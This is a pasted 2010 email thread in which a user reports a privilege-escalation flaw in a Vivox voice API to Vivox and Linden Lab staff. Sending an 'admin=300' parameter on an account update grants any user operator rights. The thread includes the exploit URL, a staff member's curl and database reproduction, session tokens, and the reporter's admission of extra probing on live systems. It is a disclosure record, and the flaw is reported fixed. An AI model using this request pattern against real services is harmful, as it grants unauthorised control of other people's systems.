Advertisement
Guest User

Zidonuke

a guest
Sep 1st, 2010
1,227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.48 KB | None | 0 0
  1. SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  2. Inbox
  3. X
  4. Reply
  5. from Zidonuke <[email protected]>
  6. date Fri, Jul 2, 2010 at 9:56 PM
  7. subject SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  8. mailed-by gmail.com
  9. hide details Jul 2
  10. -----BEGIN PGP SIGNED MESSAGE-----
  11. Hash: SHA1
  12.  
  13. This has been sent to vivox staff which I took from the admin interface
  14. since this is a vivox side exploit.
  15.  
  16. By adding a "admin" parameter to the request while logged in with "ANY"
  17. (Normal User, Admin, Whatever) will change the admin flag of that user
  18. without any checks.
  19.  
  20. Example: Will grant me Operations Admin rights
  21. http://www.bhr.vivox.com/api2/viv_acct.php?mode=update&admin=300
  22.  
  23. Response:
  24. <response xmlns="http://www.vivox.com"
  25. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  26. xsi:schemaLocation= "/xsd/user_info.xsd">
  27. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</cookie><auth_token>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</auth_token><body><level2><email></email><admin>300</admin><accountid>8024251</accountid><username>xHPoFq2qhT1eklXlxyWzE6w==</username><sip_realm>bhr.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><firstname>Melfina</firstname><lastname>Sapphire</lastname><displayname>Melfina%20Sapphire</displayname><gender></gender><age>60</age><timezone>5</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2010-04-11
  28. 18:52:13.057839-04</created><modified>2010-07-02
  29. 21:52:41.797926-04</modified><accessed>2010-07-02
  30. 21:11:02.559563-04</accessed><trialend>2030-01-01
  31. 00:00:00-05</trialend><ctype>0107121206</ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  32.  
  33. </response>
  34.  
  35. Goodluck to you all to you all on fixing this.
  36. Please note, No servers or accounts or anything has been harmed in the
  37. exploitation of this.
  38.  
  39. If you would like more info or need me for anything please feel free to
  40. email me back.
  41.  
  42. -----BEGIN PGP SIGNATURE-----
  43. Version: GnuPG v1.4.10 (MingW32)
  44. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  45.  
  46. iQEcBAEBAgAGBQJMLpi2AAoJEG12Dp/mJePAGYAH/ivRrLi45l35sWfV9z9ns73U
  47. w069XNDOPGwmoUuZz3BmEy+ZGRv/DhiY40ZRc/4bOz8fcVKkaYu/k8CnBayQF8BN
  48. 5RgBZF0rboqkZ1DwwxQHE5NJrl8ldsQ8BT1IOH1HqEWFSizeW3m0sL8jbT8ud/cQ
  49. Esryx9Jt3r5ajFTZyyC2e8pVEDiEiwQuzBSNUjxkcHynpVW1yywXdhLq9C+ixWp9
  50. o30w9SkAI+LE1/XG6QJKc7vBaHnOuaxuTiKgX2/bezLmySmKNFah6c5gYmzgHP10
  51. wbRz09b7QhfaJ7ip7CzJjkiRiv2yGew3b8qrx+YyJsurHxW5Z5NR3ITzHCYHScM=
  52. =0Gyc
  53. -----END PGP SIGNATURE-----
  54. Reply
  55. Reply to all
  56. Forward
  57. Reply
  58. from Mail Delivery System <[email protected]>
  59. date Fri, Jul 2, 2010 at 9:56 PM
  60. subject Undelivered Mail Returned to Sender
  61. mailed-by ast4a.vivox.com
  62. hide details Jul 2
  63. This is the mail system at host lib4.vivox.com.
  64.  
  65. I'm sorry to have to inform you that your message could not
  66. be delivered to one or more recipients. It's attached below.
  67.  
  68. For further assistance, please send mail to <postmaster>
  69.  
  70. If you do so, please include this problem report. You can
  71. delete your own text from the attached returned message.
  72.  
  73. The mail system
  74.  
  75. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  76. <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
  77. TO command)
  78.  
  79. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  80. <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
  81. TO command)
  82.  
  83. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  84. <[email protected]>: Recipient address rejected: vivox.com (in reply to
  85. RCPT TO command)
  86.  
  87. <[email protected]>: host mail5a.vivox.com[70.42.62.81] said: 550 5.1.1
  88. <[email protected]>: Recipient address rejected: vivox.com (in reply to RCPT
  89. TO command)
  90.  
  91. Final-Recipient: rfc822; [email protected]
  92. Original-Recipient: rfc822;[email protected]
  93. Action: failed
  94. Status: 5.1.1
  95. Remote-MTA: dns; mail5a.vivox.com
  96. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address rejected:
  97. vivox.com
  98.  
  99. Final-Recipient: rfc822; [email protected]
  100. Original-Recipient: rfc822;[email protected]
  101. Action: failed
  102. Status: 5.1.1
  103. Remote-MTA: dns; mail5a.vivox.com
  104. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address
  105. rejected: vivox.com
  106.  
  107. Final-Recipient: rfc822; [email protected]
  108. Original-Recipient: rfc822;[email protected]
  109. Action: failed
  110. Status: 5.1.1
  111. Remote-MTA: dns; mail5a.vivox.com
  112. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address
  113. rejected: vivox.com
  114.  
  115. Final-Recipient: rfc822; [email protected]
  116. Original-Recipient: rfc822;[email protected]
  117. Action: failed
  118. Status: 5.1.1
  119. Remote-MTA: dns; mail5a.vivox.com
  120. Diagnostic-Code: smtp; 550 5.1.1 <[email protected]>: Recipient address rejected:
  121. vivox.com
  122.  
  123.  
  124. ---------- Forwarded message ----------
  125. From: Zidonuke <[email protected]>
  126. Date: Fri, 02 Jul 2010 21:56:06 -0400
  127. Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  128. -----BEGIN PGP SIGNED MESSAGE-----
  129. Hash: SHA1
  130.  
  131. This has been sent to vivox staff which I took from the admin interface
  132. since this is a vivox side exploit.
  133.  
  134. By adding a "admin" parameter to the request while logged in with "ANY"
  135. (Normal User, Admin, Whatever) will change the admin flag of that user
  136. without any checks.
  137.  
  138. Example: Will grant me Operations Admin rights
  139. http://www.bhr.vivox.com/api2/viv_acct.php?mode=update&admin=300
  140.  
  141. Response:
  142. <response xmlns="http://www.vivox.com"
  143. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  144. xsi:schemaLocation= "/xsd/user_info.xsd">
  145. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</cookie><auth_token>xHPoFq2qhT1eklXlxyWzE6w==:1328121961:967ece1f76f419701c13d7f8247af98b:216.40.74.14</auth_token><body><level2><email></email><admin>300</admin><accountid>8024251</accountid><username>xHPoFq2qhT1eklXlxyWzE6w==</username><sip_realm>bhr.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><firstname>Melfina</firstname><lastname>Sapphire</lastname><displayname>Melfina%20Sapphire</displayname><gender></gender><age>60</age><timezone>5</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2010-04-11
  146. 18:52:13.057839-04</created><modified>2010-07-02
  147. 21:52:41.797926-04</modified><accessed>2010-07-02
  148. 21:11:02.559563-04</accessed><trialend>2030-01-01
  149. 00:00:00-05</trialend><ctype>0107121206</ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  150.  
  151. </response>
  152.  
  153. Goodluck to you all to you all on fixing this.
  154. Please note, No servers or accounts or anything has been harmed in the
  155. exploitation of this.
  156.  
  157. If you would like more info or need me for anything please feel free to
  158. email me back.
  159.  
  160. -----BEGIN PGP SIGNATURE-----
  161. Version: GnuPG v1.4.10 (MingW32)
  162. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  163.  
  164. iQEcBAEBAgAGBQJMLpi2AAoJEG12Dp/mJePAGYAH/ivRrLi45l35sWfV9z9ns73U
  165. w069XNDOPGwmoUuZz3BmEy+ZGRv/DhiY40ZRc/4bOz8fcVKkaYu/k8CnBayQF8BN
  166. 5RgBZF0rboqkZ1DwwxQHE5NJrl8ldsQ8BT1IOH1HqEWFSizeW3m0sL8jbT8ud/cQ
  167. Esryx9Jt3r5ajFTZyyC2e8pVEDiEiwQuzBSNUjxkcHynpVW1yywXdhLq9C+ixWp9
  168. o30w9SkAI+LE1/XG6QJKc7vBaHnOuaxuTiKgX2/bezLmySmKNFah6c5gYmzgHP10
  169. wbRz09b7QhfaJ7ip7CzJjkiRiv2yGew3b8qrx+YyJsurHxW5Z5NR3ITzHCYHScM=
  170. =0Gyc
  171. -----END PGP SIGNATURE-----
  172.  
  173. Reply
  174. Forward
  175. Reply
  176. from Mail Delivery Subsystem <[email protected]>
  177. date Fri, Jul 2, 2010 at 9:56 PM
  178. subject Delivery Status Notification (Failure)
  179. hide details Jul 2
  180. Delivery to the following recipient failed permanently:
  181.  
  182.  
  183. Technical details of permanent failure:
  184. Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 550 550 5.2.1 The email account that you tried to reach is disabled. e12si2574720wam.142 (state 17).
  185.  
  186. ----- Original message -----
  187.  
  188. Received: by 10.229.218.16 with SMTP id ho16mr1083453qcb.13.1278122167979;
  189. Fri, 02 Jul 2010 18:56:07 -0700 (PDT)
  190. Return-Path: <[email protected]>
  191. Received: from [192.168.0.198] ([216.40.74.14])
  192. by mx.google.com with ESMTPS id m24sm5354550qck.29.2010.07.02.18.56.06
  193. (version=SSLv3 cipher=RC4-MD5);
  194. Fri, 02 Jul 2010 18:56:07 -0700 (PDT)
  195. Message-ID: <[email protected]>
  196. Date: Fri, 02 Jul 2010 21:56:06 -0400
  197. From: Zidonuke <[email protected]>
  198. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100608 Thunderbird/3.1
  199. MIME-Version: 1.0
  200. Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  201. X-Enigmail-Version: 1.1.1
  202. Content-Type: text/plain; charset=ISO-8859-1
  203. Content-Transfer-Encoding: 7bit
  204. - Show quoted text -
  205. Reply
  206. Forward
  207. Reply
  208. from Ken Cox <[email protected]>
  209. to Zidonuke <[email protected]>
  210. date Fri, Jul 2, 2010 at 10:18 PM
  211. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  212. mailed-by vivox.com
  213. hide details Jul 2
  214. It's true.
  215.  
  216. [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c "select acc_id,acc_admin,acc_name,acc_password from accounts where acc_name='tester1'"
  217. acc_id | acc_admin | acc_name | acc_password
  218. --------+-----------+----------+--------------
  219. 29 | 0 | tester1 | foobar
  220. (1 row)
  221.  
  222. [kenstir@lab0c ~]$ curl -i 'http://www.mpsl.vivox.com/api2/viv_acct.php?mode=update&admin=300&auth_token=tester1:1328123230:f98f6ebb1e1158ce5d0f7c3c44435ade:10.1.1.232'
  223. HTTP/1.1 200 OK
  224. Date: Sat, 03 Jul 2010 02:18:22 GMT
  225. Server: Apache/2.2.3 (CentOS)
  226. X-Powered-By: PHP/5.1.6
  227. Cache-Control: no-store, no-cache, must-revalidate
  228. Set-Cookie: vx_session=tester1%3A1328123502%3Af06ca5f225f1351709447533277b4b60%3A10.1.1.232; path=/
  229. Expires: Mon, 26 Jul 1997 05:00:00 GMT
  230. Last-Modified: Sat, 03 Jul 2010 02:18:22 GMT
  231. Cache-Control: post-check=0, pre-check=0
  232. Pragma: no-cache
  233. Content-Length: 1252
  234. Connection: close
  235. Content-Type: text/xml; charset=utf-8
  236.  
  237. <?xml version="1.0" encoding="UTF-8" ?>
  238. <response xmlns="http://www.vivox.com"
  239. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  240. xsi:schemaLocation= "/xsd/user_info.xsd">
  241. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</cookie><auth_token>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</auth_token><body><level2><admin>300</admin><accountid>29</accountid><username>tester1</username><sip_realm>mpsl.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><email>[email protected]</email><firstname>tester1</firstname><lastname>morpheus</lastname><displayname>Mr</displayname><gender>male</gender><age>33</age><timezone>1</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2007-12-05 09:50:01.021208-05</created><modified>2010-07-02 22:18:22.02362-04</modified><accessed>2010-07-02 22:13:17.526063-04</accessed><trialend>2030-01-01 00:00:00-05</trialend><ctype></ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  242. </response>
  243. [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c "select acc_id,acc_admin,acc_name,acc_password from accounts where acc_name='tester1'"
  244. acc_id | acc_admin | acc_name | acc_password
  245. --------+-----------+----------+--------------
  246. 29 | 300 | tester1 | foobar
  247. (1 row)
  248. Reply
  249. Forward
  250. Reply
  251. from Ken Cox <[email protected]>
  252. to Zidonuke <[email protected]>
  253. date Fri, Jul 2, 2010 at 10:20 PM
  254. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  255. mailed-by vivox.com
  256. hide details Jul 2
  257. Zidonuke,
  258.  
  259. Thank you for bringing this to our attention.
  260.  
  261. -kenstir
  262.  
  263.  
  264. Reply
  265. Forward
  266. Reply
  267. from Zidonuke <[email protected]>
  268. to Ken Cox <[email protected]>
  269. date Fri, Jul 2, 2010 at 10:22 PM
  270. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  271. mailed-by gmail.com
  272. hide details Jul 2
  273. -----BEGIN PGP SIGNED MESSAGE-----
  274. Hash: SHA1
  275.  
  276. - Show quoted text -
  277. Your very welcome. I was working on some second life related things that
  278. work with the api2 urls. I was running a font_default update and noticed
  279. the field <admin>. So I was like... Ok... lets add &admin=300 to the url.
  280.  
  281. Anyways, Goodluck to you all on fixing it.
  282. -----BEGIN PGP SIGNATURE-----
  283. Version: GnuPG v1.4.10 (MingW32)
  284. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  285.  
  286. iQEcBAEBAgAGBQJMLp8BAAoJEG12Dp/mJePAZC8H/iEzm68U5zbpNXkS/QamxqnU
  287. algzq8EbEiMx/jJi5DMZWDz4lq4+K/PLmv4PerDGHPiG5fqWgJTcA66ksnbR59FA
  288. BMWhXjsjFf8Uw/l3VfR41bix19fp8AX8Tt7ldCaJ4+SlqVjaYzvKFF2qdhPghm/1
  289. oXqbQgyAvv7CSd9AQGlpz6PtjaJl/sTY3ObPS5hW3WdrQxsNKN7ILQwOZ2iuEiTu
  290. +IBOCTTL7yI0at3RgwenakOWazNc0cbt7eXWBvTMXIjk8JWvWWN8tuCNwgMvEvl4
  291. BYiTnU2oeUSLjvpkEv0dQ0oOiiQhaYkJEikGfdaohAJOT7isU459vwMxDLCtw6E=
  292. =RWbs
  293. -----END PGP SIGNATURE-----
  294. Reply
  295. Forward
  296. Reply
  297. from Zidonuke <[email protected]>
  298. to Ken Cox <[email protected]>
  299. date Fri, Jul 2, 2010 at 10:47 PM
  300. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  301. mailed-by gmail.com
  302. hide details Jul 2
  303. -----BEGIN PGP SIGNED MESSAGE-----
  304. Hash: SHA1
  305.  
  306. On 7/2/2010 10:20 PM, Ken Cox wrote:
  307. - Show quoted text -
  308. Ohhh btw. You guys couldn't let me keep the Operations Admin Role for
  309. that account? haha.
  310. -----BEGIN PGP SIGNATURE-----
  311. Version: GnuPG v1.4.10 (MingW32)
  312. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  313.  
  314. iQEcBAEBAgAGBQJMLqTKAAoJEG12Dp/mJePA7NwH/A0J3DuAnIiFBsIdTetSIW7D
  315. gp8JSNUc2YleyxgsC0yPN+3VWZ9dhp2F+QM0OV+FdNsxNLuFMRmq9FoNpLSwOFNl
  316. YqJP12ePS0W0rynijw8LPmPFwnSTc21jJws/L/gCaO/Ec/wPp0zwozZXULQNw80Z
  317. dM30KhjBi7BXAKy4qAwafDhiLpaKdXR5r+pu1hn6pR/eKt9wsUsx41o21lRIxoXO
  318. 6F21XvN2idNcm5JBKu2Uw7Q3nrq1sc+OXV6NbcZcOuYvhMd3t21lEOinv8i+9aJn
  319. vTQhvwV42c1HcSJssnCkHZIjBuvf77DGoh2/BfohFABYgR8HxtEeGN39Y6Kg/DU=
  320. =IE6F
  321. -----END PGP SIGNATURE-----
  322. Reply
  323. Forward
  324. Reply
  325. from Brian McGroarty <[email protected]>
  326. date Fri, Jul 2, 2010 at 10:47 PM
  327. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  328. hide details Jul 2
  329. Thank you for this report, and for pushing it to a wide audience at
  330. Vivox and Linden Lab. I'm leaning on Vivox to try and get this
  331. addressed despite the holiday weekend. In the mean time, I would
  332. appreciate it if you wouldn't discuss this with anyone else. I don't
  333. know how responsive their engineers will be.
  334.  
  335. Have you seen any third-party discussions to date?
  336.  
  337. > From: Zidonuke <[email protected]>
  338. > Date: Fri, Jul 2, 2010 at 6:56 PM
  339. > Subject: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  340. >
  341. >
  342. - Show quoted text -
  343. > --
  344. > Joe Miller
  345. > VP, Platform & Technology Development
  346. > Linden Research, Inc.
  347. > 945 Battery St.
  348. > SF, CA 94111
  349. >
  350. > 925 452-7578 direct
  351. >
  352.  
  353.  
  354.  
  355. --
  356. Brian McGroarty | Linden Lab
  357. Sent from my Newton MP2100 via acoustic coupler
  358. Reply
  359. Forward
  360. Reply
  361. from Zidonuke <[email protected]>
  362. to Brian McGroarty <[email protected]>
  363. date Fri, Jul 2, 2010 at 10:51 PM
  364. subject Fwd: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  365. mailed-by gmail.com
  366. hide details Jul 2
  367. -----BEGIN PGP SIGNED MESSAGE-----
  368. Hash: SHA1
  369.  
  370. Vivox has already contacted me and gave me info.
  371. Also the account I escalated to Operations Admin was already removed.
  372. It appears it will be fixed as soon as possible.
  373. Also no one else knows about this exploit. So far I'm the only one who
  374. knows about it.
  375.  
  376. On a final note. Can I Haz A Cookie Soft? :3
  377.  
  378. Zidonuke (Melfina Marshdevil)
  379.  
  380. - -------- Original Message --------
  381. Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  382. Date: Fri, 2 Jul 2010 22:20:18 -0400 (EDT)
  383. From: Ken Cox <[email protected]>
  384. To: Zidonuke <[email protected]>
  385.  
  386. Zidonuke,
  387.  
  388. Thank you for bringing this to our attention.
  389.  
  390. - -kenstir
  391.  
  392. - -------- Original Message --------
  393. Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  394. Date: Fri, 2 Jul 2010 22:18:50 -0400 (EDT)
  395. From: Ken Cox <[email protected]>
  396. To: Zidonuke <[email protected]>
  397. - Show quoted text -
  398. <response xmlns="http://www.vivox.com"
  399. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  400. xsi:schemaLocation= "/xsd/user_info.xsd">
  401. <level0><status>OK</status><cookie_name>vx_session</cookie_name><cookie>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</cookie><auth_token>tester1:1328123502:f06ca5f225f1351709447533277b4b60:10.1.1.232</auth_token><body><level2><admin>300</admin><accountid>29</accountid><username>tester1</username><sip_realm>mpsl.vivox.com</sip_realm><number></number><lang>eng</lang><alias></alias><email>[email protected]</email><firstname>tester1</firstname><lastname>morpheus</lastname><displayname>Mr</displayname><gender>male</gender><age>33</age><timezone>1</timezone><phone></phone><company></company><country></country><ext_id></ext_id><ext_profile></ext_profile><status>2</status><created>2007-12-05
  402. 09:50:01.021208-05</created><modified>2010-07-02
  403. 22:18:22.02362-04</modified><accessed>2010-07-02
  404. 22:13:17.526063-04</accessed><trialend>2030-01-01
  405. 00:00:00-05</trialend><ctype></ctype><font_default>0</font_default><postlogin>0</postlogin><score>0</score><alias_parity>t</alias_parity></level2><level2><setting></setting></level2></body></level0>
  406. </response>
  407. [kenstir@lab0c ~]$ psql -h dbp.mpsl.vivox.com -U apache prov_mpsl -c
  408. "select acc_id,acc_admin,acc_name,acc_password from accounts where
  409. acc_name='tester1'"
  410. acc_id | acc_admin | acc_name | acc_password
  411. - --------+-----------+----------+--------------
  412. 29 | 300 | tester1 | foobar
  413. (1 row)
  414.  
  415. -----BEGIN PGP SIGNATURE-----
  416. Version: GnuPG v1.4.10 (MingW32)
  417. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  418.  
  419. iQEcBAEBAgAGBQJMLqXDAAoJEG12Dp/mJePAxewIAKHbDNH33PYN6vxB7262cjtG
  420. cFC9Cd4NyOKruBe3wPgNytZoQyxpUMvfogPyx/OOzFdc4sBeVm1Pa2VthhDBFYQo
  421. 4qUq3GBCTk2QE6VxrJ5soBXmVcT3ReTHHeiNcmZUcq8e3hmHAhtsOoiHLsEWgvq6
  422. HAAz2PZz8mUzxTCABIw5TOya53SJBOpZ9hLWC/k8mSpOhLHmMfNsfjydCdgt3HSM
  423. 6w7T6Y35mbZ9laz4MQk26RJDCdpYbiAFsJFbz+7vc4zVUd/47VNc3wdCj3rahR5J
  424. 4irVgHuVnzQInTBZt/xvpioeFCThFNanKDRzenHoM94Zkf8vrxXA/IRbfOtKeVo=
  425. =qF/K
  426. -----END PGP SIGNATURE-----
  427. Reply
  428. Forward
  429. Reply
  430. from Ken Cox <[email protected]>
  431. to Zidonuke <[email protected]>
  432. date Fri, Jul 2, 2010 at 10:55 PM
  433. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  434. mailed-by vivox.com
  435. hide details Jul 2
  436. Sorry, though I did let you keep voice! I really do appreciate your wearing the white hat on this issue and letting us know without further exploit. So the deactivates/activates I saw yesterday were just you playing around? Good.
  437.  
  438. kenstir
  439. Reply
  440. Forward
  441. Reply
  442. from Zidonuke <[email protected]>
  443. to Ken Cox <[email protected]>
  444. date Fri, Jul 2, 2010 at 11:01 PM
  445. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  446. mailed-by gmail.com
  447. hide details Jul 2
  448. -----BEGIN PGP SIGNED MESSAGE-----
  449. Hash: SHA1
  450.  
  451. I assure you that no harm was done to any accounts. If there is any
  452. damage then you all can do your worst. It was very interested to learn
  453. how your guy's backend systems worked.
  454.  
  455. Most of the stuff I did was viewing, and I'll have to admit I did test
  456. ban myself and turned this one channel into a conference but as I said I
  457. did reversed anything I did.
  458.  
  459. As of right now I don't see any other exploits but I have a feeling that
  460. there may be more.
  461.  
  462. Anything from my IP range was me:
  463. NetRange: 216.40.64.0 - 216.40.95.255
  464. CIDR: 216.40.64.0/19
  465.  
  466. Also the accounts
  467. lolhax
  468. lolhax# <-- Whatever number
  469. TestAdmin2
  470. xN788byUiSE252PJ0E5ZgiQ==
  471. xHPoFq2qhT1eklXlxyWzE6w==
  472.  
  473. On 7/2/2010 10:55 PM, Ken Cox wrote:
  474. > Sorry, though I did let you keep voice! I really do appreciate your wearing the white hat on this issue and letting us know without further exploit. So the deactivates/activates I saw yesterday were just you playing around? Good.
  475. >
  476. > kenstir
  477.  
  478. -----BEGIN PGP SIGNATURE-----
  479. Version: GnuPG v1.4.10 (MingW32)
  480. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  481.  
  482. iQEcBAEBAgAGBQJMLqgjAAoJEG12Dp/mJePAqNMH/iKP3Odp3fpo2jGHEsFoCjcH
  483. W0Hz/qntgc1VgWw1mKfgwDKFqzIl3QEcOkW8uJ/OeiVs0g8rW6h6HEQG4BcLnlSA
  484. q6RUShqOBhQSlPZBL0jmlXg1AHb/qSay146R3Dw7yAC1o+IhwALS/Zbs4UpSnUEW
  485. jq0edShSmVCuBzA6w1SmWrBZJldOormhsssSMWDAneEaJIWCTDGzD7qUKmuOAokz
  486. d2fBb+9ylC6Qix0YNlHbJMEwcCFsfL+bZFNhEuhYtWt4Ilhml7bcvupuXbOO6z6s
  487. 4BkwRO9V02Ff4FJtBDOHywh/a52k6TuqSWYkqdE//Aj25l6R0V7Jp33iWguZkvE=
  488. =DPnB
  489. -----END PGP SIGNATURE-----
  490. Reply
  491. Forward
  492. Reply
  493. from Brian McGroarty <[email protected]>
  494. to Zidonuke <[email protected]>
  495. date Fri, Jul 2, 2010 at 11:04 PM
  496. subject Re: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  497. hide details Jul 2
  498. Ha! You are welcome to all my cookies, outside the browser context.
  499.  
  500. Again, thank you. I'm glad someone with good intent found this.
  501.  
  502. And at this point I'm tempted to fly out to Vivox and do physical
  503. harm. What a mess.
  504. - Show quoted text -
  505. - Show quoted text -
  506. Reply
  507. Forward
  508. Reply
  509. from Zidonuke <[email protected]>
  510. to Brian McGroarty <[email protected]>
  511. date Fri, Jul 2, 2010 at 11:09 PM
  512. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  513. mailed-by gmail.com
  514. hide details Jul 2
  515. -----BEGIN PGP SIGNED MESSAGE-----
  516. Hash: SHA1
  517.  
  518. On a side note. This effects all of there services.
  519. I'm a EVE Online player and was able to escalate my player account to
  520. Ops Admin on the EVE Vivox.
  521.  
  522. So LL shouldn't feel bad.
  523.  
  524. We should talk later tho. I've seen you around numerous times and never
  525. got a chance to say Hi more directly. See you around in SL one day.
  526.  
  527. Zidonuke (Melfina Marshdevil)
  528.  
  529. On 7/2/2010 11:04 PM, Brian McGroarty wrote:
  530. > Ha! You are welcome to all my cookies, outside the browser context.
  531. >
  532. > Again, thank you. I'm glad someone with good intent found this.
  533. >
  534. > And at this point I'm tempted to fly out to Vivox and do physical
  535. > harm. What a mess.
  536. >
  537. > On Fri, Jul 2, 2010 at 7:51 PM, Zidonuke <[email protected]> wrote:
  538. - Show quoted text -
  539. iQEcBAEBAgAGBQJMLqnyAAoJEG12Dp/mJePAM4AH/jsttDpZbovG3BxS75ld5izs
  540. tyanv4nxgy1g2ej5evQrhdSiioQXI77WwT94eA5/8zn6QWumE5467mMVnbrOnaxZ
  541. q6YuTSqEeXEZLCRq9OJbi2soLWvretLTE9CwxVXG/3UuTlXKAg6X0fnCqBatEM3p
  542. cGddiUpUT84O6XkDEdECGWyDNgzdyYf+lybADRAhuBTWsWsK00uVYihYQt7G239U
  543. ISErL6iElwhLimhlnNxm7s7/BnVGkUKoUj5ZslVXyD74dTEZeteb8APvAxiYf5lc
  544. gME3mneNLJjOEQd667/vDuBp9d2j5hMsIBU+VpigKkDjYK2ya8IiVOMqSKKPzIo=
  545. =Biiu
  546. -----END PGP SIGNATURE-----
  547. Reply
  548. Forward
  549. Reply
  550. from Ken Cox <[email protected]>
  551. to Zidonuke <[email protected]>
  552. date Fri, Jul 2, 2010 at 11:39 PM
  553. subject Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  554. mailed-by vivox.com
  555. hide details Jul 2
  556. Thanks, I do appreciate that you've gone out of your way to be helpful. Please let me and [email protected] know of any other issues you find. I believe the privilege escalation issue is now fixed.
  557.  
  558. kenstir
  559. Reply
  560. Forward
  561. Reply
  562. from Zidonuke <[email protected]>
  563. to Brian McGroarty <[email protected]>
  564. date Fri, Jul 2, 2010 at 11:40 PM
  565. subject Fwd: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  566. mailed-by gmail.com
  567. hide details Jul 2
  568. -----BEGIN PGP SIGNED MESSAGE-----
  569. Hash: SHA1
  570.  
  571. There you go.
  572.  
  573. They work fast.
  574.  
  575. - -------- Original Message --------
  576. Subject: Re: SECURITY EXPLOIT -> bhr.vivox.com/api2/viv_acct.php?mode=update
  577. Date: Fri, 2 Jul 2010 23:39:49 -0400 (EDT)
  578. From: Ken Cox <[email protected]>
  579. To: Zidonuke <[email protected]>
  580.  
  581. - Show quoted text -
  582. -----BEGIN PGP SIGNATURE-----
  583. Version: GnuPG v1.4.10 (MingW32)
  584. Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  585.  
  586. iQEcBAEBAgAGBQJMLrE0AAoJEG12Dp/mJePAUSIH+wShnFkBaMDACkk4eGXUtckV
  587. A/IX06Tl0FaaYD7XSAyUpSa6Z+zTTnhKQVlJG0NxZuqU9Vsi5z7pLSszuEg9u9vp
  588. Z5/k7Ux8uDJekTNaz0WgG7twk7Ns2CfyJi/UcgK2ssunHfuq9e/179dDm8JlzUsQ
  589. BvojbRMmZIpd2zsfzzktOuqcCnDYsqJyMaL7RKWvNeU8n4xVVVgU/ddTWOo9Hbhg
